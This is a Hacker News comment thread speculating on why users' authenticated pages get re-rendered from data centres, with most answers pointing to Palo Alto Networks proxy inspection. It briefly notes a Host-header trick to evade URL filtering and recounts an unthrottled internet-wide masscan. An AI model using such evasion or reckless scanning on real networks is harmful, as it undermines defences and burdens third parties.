10 Second Teleportation

jitl|2 years ago

I found a few leads googling around Palo Alto Networks docs website:

- "Advanced URL Filtering" seems to have a feature where web content is either can be evaluated "inline" or "web payload data is also submitted to Advanced URL Filtering in the cloud" [1].

- If a URL is considered 2 spooky to load on the user's endpoint, it can instead be loaded via "Remote Browser Isolation" in a remote-desktop-like session, on demand, for that single page only [2].

I think either (or both) could explain the signals you're detecting.

[1]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm....

[2]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm...

caydenm|2 years ago

This looks exactly like it!! Nice find!

FreakLegion|2 years ago

Ex-PANW here. It's almost certainly the firewall's URL Filtering feature (aka PAN-DB).

When someone makes an HTTP request, the firewall takes the host and path from the request and looks them up first in a local cache on the data plane, then in the cloud. (As you can imagine, bypassing the entire feature is therefore trivial for malware. You just open a connection to an arbitrary IP address and put, say, google.com in the host header. As far as the firewall can tell, you are in fact talking to google.com.)

When the URL isn't already known to the cloud, or hasn't been visited more recently than its TTL, it goes into a queue to be refreshed by the crawler, which will make its way there shortly thereafter to classify the page.

Palo Alto has other URL scanners, but none that would reliably visit the page after the user. URLs carved out of SMTP traffic, for example, would mostly be visited before the real user, not after.

lxgr|2 years ago

Would that explain getting past an auth wall though, i.e. loading the HTML page as if the user were logged in but without auth headers and cookies?

qwertox|2 years ago

Might as well be a browser extension.

I remember setting up a Confluence server which was only used by me, but had public access (still password protected).

When checking the logs, I noticed an external IP trying to access pages which I had accessed previously, but they got redirected to the log-in page. The paths were very specific, some which I had bookmarked, so it was clear that there was an extension logging my browsing and some server or person then tried to access my pages.

transpute|2 years ago

Could it be a MitM "enterprise browser" like Talon or Island, and/or related browser extensions?

https://www.paloaltonetworks.com/company/press/2023/palo-alt...

> Dec. 28, 2023 Palo Alto Networks .. announced that it has completed the acquisition of Talon Cyber Security, a pioneer of enterprise browser technology ... Talon's Enterprise Browser will provide additional layers of protection against phishing attacks, web-based attacks and malicious browser extensions. Talon also offers extensive controls to help ensure that sensitive data does not escape the confines of the browser.

https://www.island.io/product

  Set hyper-granular policies ... boundaries across all users, devices, apps, networks, locations, & assets 

  Log any and all browser behavior, review screenshots of critical actions, & trace incidents down to the click

  Critical security tools embedded into the browser: like native browser isolation, automatic phishing protection, & web filtering

runlevel1|2 years ago

> Palo Alto Networks ... after reading product page after product page, we couldn’t work out exactly what product it was

Well that definitely tracks.

m463|2 years ago

I remember I worked somewhere where they had something like this. Most people had windows machines, but I had a mac that I had installed.

My machine wanted me to accept a client certificate from palo alto networks.

I did not and kept refusing.

I think they had some sort of intrusive mitm proxy that filtered everything everyone was doing/browsing.

pastage|2 years ago

The usual way is to require a custom CA for all clients, sounds like an ineffective setup if you can just ignore it. I.e. it should be a intermediate certificate for the proxy you need to acknowledge.

bloody-crow|2 years ago

It could be a chat preview generator. Users DM links to some internal project pages in an chat tool and the tool fetches the page in the background in an attempt to render a preview.

caydenm|2 years ago

That was on my list of candidates as well! Those usually have a specific user agent making it clear what they are, they appear from a companies netblock (eg. Facebook, Microsoft) and cannot access authed pages (unless the key is in the url).

In this case these appeared to be all MitM'ed pages from a security device since the key wasn't in the url and it contained userids for a specific user.

jitl|2 years ago

In that case, the preview system would do (eg) GET https://example.com/private/page, but get a 401 Unauthorized response back, and have none of the page content or execute any of the scripts inlucded in that /private/page:

> * That somehow had the page content from a user

> * Would render and execute all scripts on that page as if it was that user

gaudat|2 years ago

Same thing happened with my work computer in the office network with a MITM HTTPS firewall. The IP address jumps between the coasts randomly confusing the Windows weather widget. Images failing to load on a lot of websites because the IP address change triggers something in their CDN. Everything is working fine when I'm WFHing so it has to be the office network.

Oh and this can also happen when a mobile user is jumping off their home wifi network to a internationally roaming data card. Why they would do that? Because data is cheaper this way, or they are actually tourists. So please do not block users just because they are doing this teleportation dance.

ginko|2 years ago

My mail provider locked my account after I used the satellite internet on an intercontinental flight (my IP location must have bounced all over). Got a serious scare later at my hotel since pretty much all of my itinerary plans and details were kept there.

Thankfully that could be resolved, but it wasn't a great way to start a vacation.

yoz|2 years ago

Here's my wild guess:

Some other code running in the browser window (probably a browser extension, but possibly another script tag in the page, inserted by an intermediate firewall/proxy) is doing this. It could be corporate spyware (i.e. forced on users by the IT department), or an extension that only tends to be used by large institutions (because it relates to some expensive enterprise product). Alternatively, it could be a much more popular browser extension, but it only executes this capture when it determines that the user is within a target list of large institutions.

I'm making the same guess as the author about the execution process: that the code is shipping a huge amount of page content to a cloud server, e.g. the full DOM, and then rendering that DOM in this older Chrome version. It's not fetching the same page from the origin server, which is how it's able to do this without auth cookies.

As part of rendering, the page's script tags all get executed again, which is why Upollo is seeing this. (Note that I don't know if this re-execution of script tags is deliberate. There's a good chance that it's an unintended side-effect of loading the DOM into Chrome, but it doesn't seem to break anything so nobody's bothered to disable it.)

It's only sampling a small percentage of executions, which is why it's not continually happening for every interaction by these users.

It's waiting ten seconds so that the page's network interactions are likely to have finished by then. Waiting longer would increase the odds of the user navigating to another page before the code has had a chance to run.

The article doesn't say if there are particular kinds of pages being grabbed, but looking for commonality between them would help.

The main thing that stumps me – assuming I've understood it correctly – is why the second render is happening across such a diverse set of cloud networks.

caydenm|2 years ago

Browser extension is what we originally thought for exactly the same reasons you did. We started to see some requests show up from iOS devices which didn't support extensions so that made us think MitM corporate proxies.

The diversity of cloud networks looks to be due to these being deployed by individual institutions (eg. universities, corporations etc.) rather than only run from Palo Alto Network's data centers.

We also saw slightly different configurations with different browser versions, but with the same pattern of behaviour.

maxlin|2 years ago

"Palo Alto Networks" is something that shows up clearer than anything else in my lighttpd logs, as they include the "we're palo alto networks doing research, contact us here(email) for us not to scan" in http request headers. They appear to do full ipv4 range scan many times a day IIRC.

Funnily enough I got motivated to try to make my crawler show up the same way in my own server logs by just raw scan breadth, IE by hitting so many servers I'd see my own crawler in the logs without any kind of targeting. As a kind of "planetary level experiment" source of curiosity.

Had to tweak masscan settings till my crappy router could keep up with the routing load. Ended up with something like 500 addresses / sec, which pales in comparison to the best hardware used for this which when combined with masscan, scans the ipv4 space in 6 minutes. Managed to scan 1% of the IPV4 space while I slept before I started to get seriously throttled and got a quite angry email from my ISP. Just told them "Oh thanks for noticing, I now fixed the offending device" (pressed Control+C) and never ran the scan again lol.

Ran the scan with masscan with no blacklist. Don't recommend, at least not doing it more than once unless you get a good blacklist to follow

internetter|2 years ago

> masscan

> This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.

Absolutely insane

Sporktacular|2 years ago

Aren't there systems where a server does the browsing and/or page rendering but it's controlled by terminals using other protocols?

Just speculatively, if someone was managing the setup of a room full of NSA analysts browsing for OSINT, how would they cover their tracks? What would that traffic look like?

sandworm101|2 years ago

It would look much like any other institution full of people doing general web browsing. A university full of foreign students googling stuff in thier home languages. A hospital full of patients googling about random stuff. An airport full of international passengers surfing twitter feeds for war news.

pbnjay|2 years ago

Sounds like it could easily be the Cisco umbrella junk a few gov/universities have had that I’ve seen. They install MITM CAs[0] on managed hardware so they can definitely see page content.

[0] https://docs.umbrella.com/deployment-umbrella/docs/install-c...

Edited to add link to docs.

mattmmatthews|2 years ago

What would the benefit of something like this even be? Is it possible it's some sort of tool that archives a user's internet usage?

caydenm|2 years ago

It appears this is to find threats that might have no otherwise triggered or work out is particular sites are dangerous without monitoring a users machine.

It is scary that for people in a corporate environment this could be rendering banking, messaging or any other pages contents.

koliber|2 years ago

I spoke w. a Palo Alto vendor rep a few months ago. We were talking about the features of the firewall appliance one of my clients was using.

They have a feature that effectively "tests" what the user is about to load in a virtual environment, and sees if that content behaves abnormally. I forgot what they called it. It sounds like this could be it.

unknown|2 years ago

[deleted]

teekert|2 years ago

Maybe remnants of Genesis Market [0]?

[0] https://en.wikipedia.org/wiki/Genesis_Market

admaiora|2 years ago

A lot of larger orgs (Universities etc) use Palo Alto Networks Global Protect VPN as their VPN for accessing the orgs intranets.

Maybe related somehow to that?

gmerc|2 years ago

With the rise of “store all the things you see / interact with for LLM recall” solutions, it could just be that. Some kind of async archival

nsonha|2 years ago

> obviously some kind of security system

I don't know where the "security" bit comes from, but this is, to me, obviously web scrapping

matt3210|2 years ago

This could be a browser AI tool that scans pages (copilot does this in edge… is useful)

lxgr|2 years ago

Could it be a "read it later" type of article reader/storage service? I know of at least one that fits the bill in that it uploads locally-viewed HTML to a server which then renders that page in a headless Chrome instance for archival:

I've recently been wondering how Omnivore, unlike e.g. Pocket, is able to store paywalled content (for which I have a subscription) on iOS when saving it via the Omnivore app target in the share sheet, but not when directly pasting the target URL in the webapp or iOS app.

Turns out that sharing to an iOS app actually enables [1] the app to run JavaScript in the Safari web context of the displayed page, including cookies and everything!

If I'm skimming the client and server source code correctly, it does just that: It seems to serialize and upload the HTML of the page [2] and then invokes Puppeteer on the server [3]. Puppeteer is a scriptable/headless Chrome – that would fit the bill of "an outdated Chrome running in a data center"!

Omnivore can also be self-hosted since both client and server are open-source; that would explain you seeing multiple data center IPs.

[1] https://developer.apple.com/library/archive/documentation/Ge...

[2] https://github.com/omnivore-app/omnivore/blob/main/apple/Sou...

[3] https://github.com/omnivore-app/omnivore/blob/57aca545388904...

mholm|2 years ago

I wonder if this could be iCloud Private Relay? It appears that it's effectively a VPN with some redirection layers that change often, though I don't know the exact details.

jitl|2 years ago

From the article:

> But wait, these are different devices, they have none of the same cookies. If this were a VPN it would be the same device.

rompledorph|2 years ago

Prisma Cloud / Global Protect?

nextlevelwizard|2 years ago

Who thinks it is appropriate to use one second looping gif on article?

Could be interesting, but I cant read this shit with flashing images.

dag11|2 years ago

Unrelated to the article directly, it's kinda neat that the site's text selection highlight color is randomized on every mousedown.

cypherpunks01|2 years ago

  /* Text Higlight Color /**/
  :root {
    --highlight-color: null;
  }

  ::selection {
    background: var(--highlight-color);
    color:#FFFFFF;
  }
  ::-moz-selection { /* Code for Firefox */
    color: #FFFFFF;
    background: var(--highlight-color);
  }
  </style>

  <!-- Text Highlight -->
  <script>
    const colors = ["#F76808", "#30A46C", "#0091FF", "#6E56CF", "#E5484D"];
    window.addEventListener("mousedown", (e) => {
      const color = colors.shift();
      document.documentElement.style.setProperty("--highlight-color", color);
      colors.push(color);
    });
  </script>

caydenm|2 years ago

Josh on our team is so happy people discovered and liked his easter egg!

farkanoid|2 years ago

I'm ashamed to admit that I spent more time highlighting random snippets of text than I did reading the article.

vitiral|2 years ago

I went back just to see and it chose WHITE as the first option, making the text invisible lol

pronouncedjerry|2 years ago

did cursor-fidgeting-while-reading lead to this discovery?

aaron695|2 years ago

I'm missing something

> strange devices show up for some of our customers' users

> how did it load these pages which were often behind an authwall without ever logging in or having auth cookies?

Either

- The customer has screwed up user auth big time and some X knows that.... lets go with no

- OP's data is wrong or they are reading it wrong

- They are explaining it badly.

jitl|2 years ago

What's happening is that some MiTM Palo Alto networks system is intercepting the HTML contents of the page, waiting a bit, and then rendering that HTML content again in old Chrome on a separate machine. It's like if you go to a authenticated page that only you can see, like https://news.ycombinator.com/flagged?id=aaron695, did "View Source", copy-and-paste that source into a HTML file, and then you send me the HTML file and I open the HTML file on my computer.

unknown|2 years ago

[deleted]

jagged-chisel|2 years ago

Ten Second*

meepmorp|2 years ago

Thank you. I'm not the brightest, and could not figure out the headline. What was the first teleportation?

FreeFull|2 years ago

Yet another example of how HN's automated title modification screws things up

66 comments